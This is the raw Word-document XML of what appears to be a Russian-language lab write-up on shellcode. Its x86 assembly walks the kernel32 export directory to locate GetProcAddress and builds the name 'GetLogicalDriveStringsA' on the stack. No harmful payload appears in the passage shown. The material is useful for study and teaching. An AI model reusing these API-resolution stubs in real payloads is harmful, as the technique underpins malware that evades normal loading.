              <w:t>TimeDateStamp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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>      0x04</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E342437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>  WORD    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>MajorVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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>       0x08</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415E22C1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>  WORD    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>MinorVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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>       0x0A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5368189C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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">Name;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">               0x0C </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B84F1FC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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">Base;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>               0x10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16443E2B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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>NumberOfFunctions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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0x14 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5311C77E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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>NumberOfNames</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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    0x18 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C1F1EBD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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>AddressOfFunctions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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0x1C &lt;- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>цель</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00EB1D11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DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>AddressOfNames</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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   0x20 &lt;- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>цель</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C6D7F0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 xml:space="preserve">;   </w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  DWORD   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>AddressOfNameOrdinals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">; 0x24 &lt;- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>цель</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2556E5F6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gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>; }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>DIRECTORY;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="11C0D028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2CFE5471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   mov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esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [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+ 20</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33FA3896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add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esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU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gramStart"/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;</w:t>
            </w:r>
            <w:proofErr w:type="gram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ESI</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> теперь указывает на начало массива УКАЗАТЕЛЕЙ!!!! </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>на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имена</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="21599B8D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05B12786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xor ecx, ecx       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;индекс</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7845F51A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2ED8D3D8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find_function_loop:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F43C070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   mov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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>esi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+ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx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* 4] </w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart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>;указатель</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4 байта</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753A60A7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gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>add</w:t>
            </w:r>
            <w:proofErr w:type="gram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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">, ebx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9AC9F2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5C423CAD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; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>GetP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> (0x50746547)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741EAB09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cmp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dword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>], 0x50746547</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57947194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jnz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next_function</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D61799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54544ACE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; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>rocA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> (0x41636F72)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C6B55A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cmp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dword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 4], 0x41636F72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2228027B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jnz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next_function</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F3F8C7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719BF129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; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ddre</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> (0x65726464)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067FB04D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cmp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dword</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 8], 0x65726464</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9B3DEE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jz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find_function_finished</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA3C9FF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4F892343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spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>next_function</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1AA332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inc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> ecx                      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F3978C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jmp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find_function_loop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47099C4B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56BDB932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find</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>finished</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477685BC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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>;теперь</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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как база, содержащая абсолютный адрес </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>кернела</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="28F55D95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 xml:space="preserve">mov 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 3Ch]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6813E043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add 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</w:p>
          <w:p w14:paraId="5D8F60F3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mov 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, [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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> + 78h]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608738B8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add 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18105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>, ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E97E102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639FCE5C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   mov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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [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+ 24</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>] ;массив</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ординалов</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="04BC87F3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gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>add</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU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</w:p>
          <w:p w14:paraId="4FB837AA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</w:p>
          <w:p w14:paraId="693C4C0C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mov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cx</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [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+ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx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* 2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>] ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ординал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2 байта, достаем</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493E59A7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</w:p>
          <w:p w14:paraId="780227B8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mov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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>edx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+ 1</w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Ch</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>] ;заходим</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> в массив адресов функций</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BAA5B3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gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>add</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU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</w:p>
          <w:p w14:paraId="64736E36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</w:p>
          <w:p w14:paraId="3B57F192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mov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E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, [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+ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ecx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* 4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>] ;достаем</w:t>
            </w:r>
            <w:proofErr w:type="gram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RVA</w:t>
            </w:r>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> адрес функции по ее </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ординалу</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="37DB53B8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add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</w:p>
          <w:p w14:paraId="74277FF9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</w:p>
          <w:p w14:paraId="2A657443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lastRenderedPageBreak/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mov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ebp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>eax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;поскольку</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> в стеке планируем вызвать новую функцию, то запомним ее адрес в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ebp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1129EB1C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</w:p>
          <w:p w14:paraId="102D5091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 xml:space="preserve">; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>GetLogicalDriveStringsA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3578716A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mov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 xml:space="preserve">, 0x417367FF </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>Asg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>" и FF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A3C5D3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shr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>, 8          </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">  0x00417367</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DE91314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push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</w:p>
          <w:p w14:paraId="218DE7E5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push 0x6E697274     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "trin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C05F8F5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push 0x53657669     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>iveS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2CB4C1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push 0x72446C61     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>alDr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1F4395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push 0x6369676F     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>ogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C705B28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push 0x4C746547     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>  ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>GetL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D65F7EE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gramStart"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>;теперь</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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esp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указывает на </w:t>
            </w:r>
            <w:r w:rsidRPr="0018105F">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE53C9A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mov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ecx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esp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proofErr w:type="gramStart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>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E748AD">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> сохраним указатель</w:t>
            </w:r>
          </w:p>
